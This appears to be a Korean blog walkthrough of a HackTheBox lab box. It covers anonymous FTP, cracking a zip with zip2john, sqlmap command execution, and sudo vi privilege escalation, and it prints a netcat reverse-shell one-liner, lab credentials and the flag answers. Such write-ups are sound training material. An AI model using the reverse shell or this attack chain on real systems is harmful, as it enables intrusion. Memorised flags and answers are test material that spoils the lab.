TASK 1

Besides SSH and HTTP, what other service is hosted on this box?

: FTP



TASK 2

This service can be configured to allow login with any password for specific username. What is that username?

: anonymous



TASK 3

What is the name of the file downloaded over this service?

: backup.zip

 

TASK 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

ftp에서 밭은 backup.zip파일이 잠겨있다.

zip2john을 사용해서 크랙 해보자.

: zip2john

압축 해제 완료!!

 

TASK 5

What is the password for the admin user on the website?

index.php를 열어보자.

Usernameadmin이고, passwordmd5로 복호화해야 한다.

ID : admin

PW : qwerty789

 

: qwerty789

 

로그인하고.. 검색창에서 sqli가 가능할 것이라는 생각이 들었다.

sqlmap으로 확인해 보자.쿠키 값이 필요하다.)

연결이 되는 것을 확인했다.

이제 nc를 열어서 좀 더 편하게 사용해 보자.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <PORT> >/tmp/f

연결이 완료된 것을 확인할 수 있다.

TASK 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

: --os-shell

sudo -l을 사용하려면 사용자 계정과 비밀번호를 알아야 한다.

/www/var/html로 이동해서 dashboard.php파일을 열어보자.

ID : postgres

PW : P@s5w0rd!

 

로그인 성공!!

 

TASK 7

What program can the postgres user run as root using sudo?

: vi

 

SUBMIT FLAG

Submit user flag

: ec9b13ca4d6229cd5cc1e09980965bf7

 

SUBMIT FLAG

Submit root flag

(b)를 사용하여 root flag를 얻을 수 있다.

: dd6e058e814260bc70e9bbdef2715849

'HackTheBox' 카테고리의 다른 글

[HTB] Unified  (0) 2023.03.29
[HTB] Oopsie  (0) 2023.03.23
[HTB] ArcheType  (0) 2023.03.23
[HTB] Tactics  (0) 2023.03.22
[HTB] Pennyworth  (0) 2023.03.22

+ Recent posts